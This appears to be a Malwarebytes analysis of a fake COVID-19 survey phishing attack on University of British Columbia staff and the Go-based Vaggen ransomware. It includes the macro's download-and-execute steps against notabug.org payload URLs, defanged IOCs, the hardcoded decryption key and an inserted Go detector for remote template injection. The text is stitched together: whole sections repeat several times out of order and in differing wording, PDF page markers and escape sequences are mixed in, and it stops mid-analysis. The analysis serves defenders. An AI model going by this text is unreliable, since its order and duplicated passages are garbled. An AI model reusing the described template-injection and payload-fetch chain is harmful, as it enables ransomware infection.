The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1865 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1866 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1867 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Hashes are SHA-256; URLs are defanged with [.].

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document.
A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The .docx itself carries no VBA: Word resolves the document’s external attachedTemplate relationship at open time and fetches the .dotm from there, so a filter that only inspects the attachment for macros sees a clean document. The template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of Shell, which is the task ID of the started process when the launch succeeds
If successful, sends an HTTP GET request to:
canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, sends an HTTP GET request to:
canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website.
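The template-injection hook described above can be checked on a suspicious document without opening it in Word: the link to the remote .dotm lives in the package’s relationship parts, not in the visible text. The following Go program is an added example written for this page (it is not Malwarebytes’ tooling and not code from the attacker). It scans every .rels part of an OOXML package for an attachedTemplate relationship whose TargetMode is External and prints the Target. The minimal document it builds in memory, and the template URL http://templates.example/template.dotm inside it, are constructed placeholders, since the post does not give the full URL of the injected template.

```go
// docx_remote_template.go: lists the external attachedTemplate targets of an
// OOXML document, the hook that template injection relies on.
// Added example for this page; not Malwarebytes' or the attacker's code.
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"os"
	"strings"
)

// Relationship type Word resolves when it loads a document's attached template.
const attachedTemplateRel = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// Constructed placeholder; the post does not give the real URL of template.dotm.
const sampleTemplateURL = "http://templates.example/template.dotm"

type relationship struct {
	ID         string `xml:"Id,attr"`
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	Rels []relationship `xml:"Relationship"`
}

// findRemoteTemplates walks every .rels part in the package and returns the
// Target of each attachedTemplate relationship whose TargetMode is External.
// A benign document has no such relationship, or one pointing at a local path.
func findRemoteTemplates(doc []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML package: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		body, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(body, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateRel && strings.EqualFold(r.TargetMode, "External") {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// buildSampleDocx constructs, in memory, the two parts that matter for the
// check: word/settings.xml naming rId1 as the attached template, and the .rels
// part binding rId1 to target with the given TargetMode. Test data only.
func buildSampleDocx(target, mode string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	parts := map[string]string{
		"word/settings.xml": `<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"` +
			` xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">` +
			`<w:attachedTemplate r:id="rId1"/></w:settings>`,
		"word/_rels/settings.xml.rels": `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
			`<Relationship Id="rId1" Type="` + attachedTemplateRel + `" Target="` + target +
			`" TargetMode="` + mode + `"/></Relationships>`,
	}
	for name, content := range parts {
		w, _ := zw.Create(name)
		io.WriteString(w, content)
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: docx_remote_template <file.docx>")
		os.Exit(2)
	}
	doc, err := os.ReadFile(os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	hits, err := findRemoteTemplates(doc)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, h := range hits {
		fmt.Println("remote template:", h)
	}
}
```

Any hit is worth a closer look even when the host looks legitimate: code-hosting raw endpoints such as the notabug.org paths in the IOCs are exactly how this actor served the template. The same scan also catches relationships placed in other .rels parts, which is why every part is read rather than only word/_rels/settings.xml.rels.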
Defenders typically use canary tokens to get alerted when a particular event occurs; they make a useful early warning that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Three of them map to recognizable roles:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, is linked from the original post.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”).
The decrypted note is written to the Desktop once execution finishes.

Encrypting and renaming of the files is deployed as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32 byte long key) in GCM mode. The encryption routine is similar to a widely circulated Go AES-GCM example (linked from the original post): it uses a hardcoded key and a 12 byte long nonce generated by CryptGenRandom, which is what Go’s crypto/rand reader called on Windows at the time, and encrypts the file content with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) is, in order:
the 12 byte long nonce
the encrypted content
the 16 byte long GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”; the trailing ‘0’ pads the phrase to exactly 32 bytes, which is what selects AES-256. Because the key is fixed and the nonce is stored in the clear at the start of every file, anyone holding the key can decrypt the content. With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk.
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1879 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1880 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1881 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1882 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1883 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1884 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1885 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1886 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1887 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1888 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1889 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1890 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1891 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims into paying to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box and Dropbox. Rather than sending the fake survey directly by email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters, which would have blocked messages coming from a newly registered email address with a low reputation. Share notifications from file sharing services are much harder to filter without creating a large number of false positives, because they are sent by the legitimate platform rather than from the attacker's own address.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, since an automated scanner without an account cannot fetch a privately shared file, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection: the .docx itself carries no macro, only a reference to a remote template (template.dotm) that Word downloads and loads when the document is opened, and it is that template which is weaponized with the malicious macro.
The remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started program)
If successful, sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it is not successful, sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, defenders use this type of service to get alerted when a particular event occurs, for example when a planted decoy document is opened; this can be very useful as an early warning that an intruder has gained access to a network.
In this case, however, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Some of these correspond to recognisable routines:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (for example the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64, then decrypted with the hardcoded XXTEA key "STALKER". At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback passed to the standard Go library function filepath.Walk (package path/filepath), which visits every file under the chosen root.

